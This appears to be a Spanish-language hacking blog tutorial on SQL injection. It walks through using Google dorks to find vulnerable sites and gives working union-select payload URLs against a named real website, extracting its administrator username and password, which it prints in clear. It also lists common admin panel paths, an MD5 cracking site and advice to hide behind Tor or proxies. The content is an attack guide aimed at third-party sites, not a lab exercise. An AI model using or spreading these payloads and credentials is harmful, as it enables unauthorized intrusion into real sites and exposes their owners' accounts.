Si quieres afiliarte a mi blog

Conctactame ShadinessDark@hotmail.es

[Tutorial] Sql Injection By ShadinessDark

SQL INJECTION By ShadinessDark
By ShadinessDark

Puntos a seguir:

1.) ¿Que es SQL injection?

2.) Jugando Con Google

3.) Testeando vulnerabilidad

4.) Buscando panel

5.) Conclusion

6.) Despedida

1.) ¿Que es SQL injection?

Bueno digamos que es un truco para inyectar comandos SQL en un sitio Web
OH hacer una consulta como un insumo, Principalmente el atacante la hace en la
Forma de método GET – POST la mayoría de los sitios de parámetros hace una Consulta SQL en la base de datos digamos que tenemos una pagina de detalles
Con un producto en PHP que toma un parámetro product_id de un método GET
Y obtiene el detalle de la base de datos una consulta SQL con el ataque de Injection SQL, Un atacante puede enviar una consulta SQL diseñada desde la dirección URL, De
La pagina de detalles del producto se recuerdan el product_id bueno la consulta la hace
Desde hay con eso podría hacer mucho daño a la base de datos, Podría incluso eliminar la tabla de base de datos…

Para saber mas sobre SQL pueden acceder a Aqui...

2.) Jugando Con Google

Vamos a jugar un como con google se trata de DORKS con este conseguiremos
Web al azar visitemos www.google.com

Nos podemos conformar con una simple dork, En mi caso estoy usando:

Código:

/noticias.php?id=




Otros Dorks

Código:

/videos.php?id=
/post.php?id=
/Noticias.php?id=
/index.php?id=7
/proyecto.php?id=
/Ventas.php?id=


Y otros.

Esto lo vamos a usar para buscar nuestra victima nos saldrán muchas paginas
Web en google con cualquiera de estos DORKS claro que no toda las que aparecen
Son vulnerables hay que buscar y buscar correr con suerte por decir así.

3.) Testeando vulnerabilidad

Cuando entremos a una de las Web de google y termine en:

Código:

?id=


Vamos agregarle ' quedaría:

Código:

?id='


Si es vulnerable nos saltara el siguiente error:



Ejemplo les pondré una Web Vulnerable:

Código:

http://www.diariopuerto.com/noticias.php?id=%27


Cuando sabemos que es vulnerable le quitamos el (‘) y ponemos

Código:

-1+union+all+select+0—

Como sabemos unión simplemente es una cláusula para combinar
Los resultados de varias consultas que se hacen en la base de datos
Y con SELECT debemos confirmarlo manualmente.

Ya tenemos una victima en mi caso es:

Código:

http://www.diariopuerto.com/


Vamos encontrando las columnas un breve ejemplo

Código:

http://www.diariopuerto.com/noticias.php?id=1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--


En este caso tiene 21 columnas como pueden ver me tiro los siguientes números:



Claro que una web puede tener más de 21 columnas o menos de 21 columnas
Cuando les tire unos números parecidos a los de la imagen hasta hay llega la
Columna tampoco que les tirara los mismos números puede tirar 1 2 3 4 5 6 7 etc.…

No pondré el ejemplo de usar: +from+information_schema.tables—
Ya que en muchos tutoriales lo usan lo haremos por los caracteres que conozco…

Ahora busquemos la tabla ya hemos sacado la columna ahora vamos por la tabla
Agregamos lo siguiente en la url:
Código:

+from+


Quedaría así:

Código:

http://www.diariopuerto.com/noticias.php?id=1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+


Ahora vamos a buscar la tabla la tabla lo hacemos de la siguiente manera:

Código:

http://www.diariopuerto.com/noticias.php?id=1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+usuarios


Después de +from+ agregamos la tabla no siempre será usuario algunos ejemplos de tabla.

Usuarios
Usuario
Nombre
Nombres
Email
Emails
Mail
Mails
User
Users
Users_name
User_name
adm_usuario
Admin.
Login
Usr
Admin._login

Esta es una de las más comunes en sitios vulnerables a la hora de sacar TABLAS.

Bueno ya les puse lo de arriba la mía salio con usuarios si por ejemplo ponemos
Usuarios y la tabla no es nos seguirá saliendo el error en la sintaxis, Pero si la tabla
Es nos saldrán los numeritos y esa es la correcta.

Después de tener la tabla ahora saquemos usuario y password del administrador

Ejemplo:

Código:

http://www.diariopuerto.com/noticias.php?id=1+union+select+0,1,2,3,4,5,6,login,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+usuarios


Como saben en mi caso la Web que use me tiro 3 números en la cual 7 8 y 9
Ahora vamos a remplazar un numero en mi caso reemplazo el 7 lo borro y coloco
,login, como me agarro esto me saltara el nombre de la victima en este caso el usuario
Del login es: puerto

Como saben no siempre agarrara poniendo login en algunas te piden usuario, usuarios, nombres etc.…
Arriba les deje un poco…
Ahora ya tenemos usuario del administrador del sitio ahora vamos a buscar el password es decir la clave.

Vamos a quitar el login del 7 y vamos a remplazarlo por esto concat(login,0x3a,password)

Quedaría así:

Código:

http://www.diariopuerto.com/noticias.php?id=1+union+select+0,1,2,3,4,5,6,concat%28login,0x3a,password%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+usuarios


concat(login,0x3a,password) Donde va login hay va la columna del usuario no Vuelvo y repito no siempre es login y vemos 0x3a Esto solo es un carácter hexadecimal y vemos que agregamos (,) y viene password que es por la cual
Donde sale la contraseña del usuario 0x3a,password tampoco siempre es Password
Hay varios tipos de formas por ejemplo:

Clave
Claves
Password
Pwd
Pass
Pas
Contraseña (Muy poco la agarra)

Ya tenemos pass y user en mi caso el usuario y la contraseña:

Código:

puerto:puerto7002


Usuario: puerto
Clave: puerto7002

Muchas veces el password nos viene encriptado por hay hay unos MD5 online
Para que sirve bueno cuando les salga la contraseña encriptada un ejemplo:
Código:

A259ECE2E42597865AB7ACC883A21FFE


Esta clave encriptada dice ShadinessDark.

Bueno esto lo usan los Web Master para darle un dolor de cabeza
A los atacantes ya que muchas veces las claves cuestan un mundo
Desencriptarlas…

MD5 Online
http://passcracking.com/

Hay password muy difíciles de desencriptar como por ejemplo la del PENTAGONO pero podemos hacer un desencriptador en algoritmo
Que genere un password hasta que de con la verdadera.

4.) Buscando panel

Ya después que tenemos los datos del sitio es decir usuario y contraseña de
Administrador vamos a buscar el login a veces en algunas Web hay suertes
En otras no por ejemplo en la que puse como ejemplo no he encontrado el
Panel así que les daré un ejemplo de cómo hacerlo ejemplo:

www.xD.com/login.php
www.xD.com/login
www.xD.com/admin
www.xD.com/admin.php
www.xD.com/phpmyadmin
www.xD.com/cpanel
www.xD.com/login/admin

Bueno encontramos el panel y nos logeamos normalmente como administradores
Recuerden no hacer mal de borrar todo ni nada.

User un buen Proxy tor o proxymafia que es online…

5.) Conclusion

Como podemos ver no es algo del otro mundo se trata de hacer inyecciones a través de La URL, Con esto podemos lograr mucho pero recordemos no dañar los sitios…

6.) Despedida

Este tutorial es dedicado a dos amigos de BugDox que me lo han pedido
Y bueno ya sabemos que hay muchos tutoriales en la red y muy explicados
Pero me tome la libertad de hacerme uno un saludo grande a mi comunidad…

By ShadinessDark
Team V1rtual Viru$ Bl@ck Team

0 comentarios: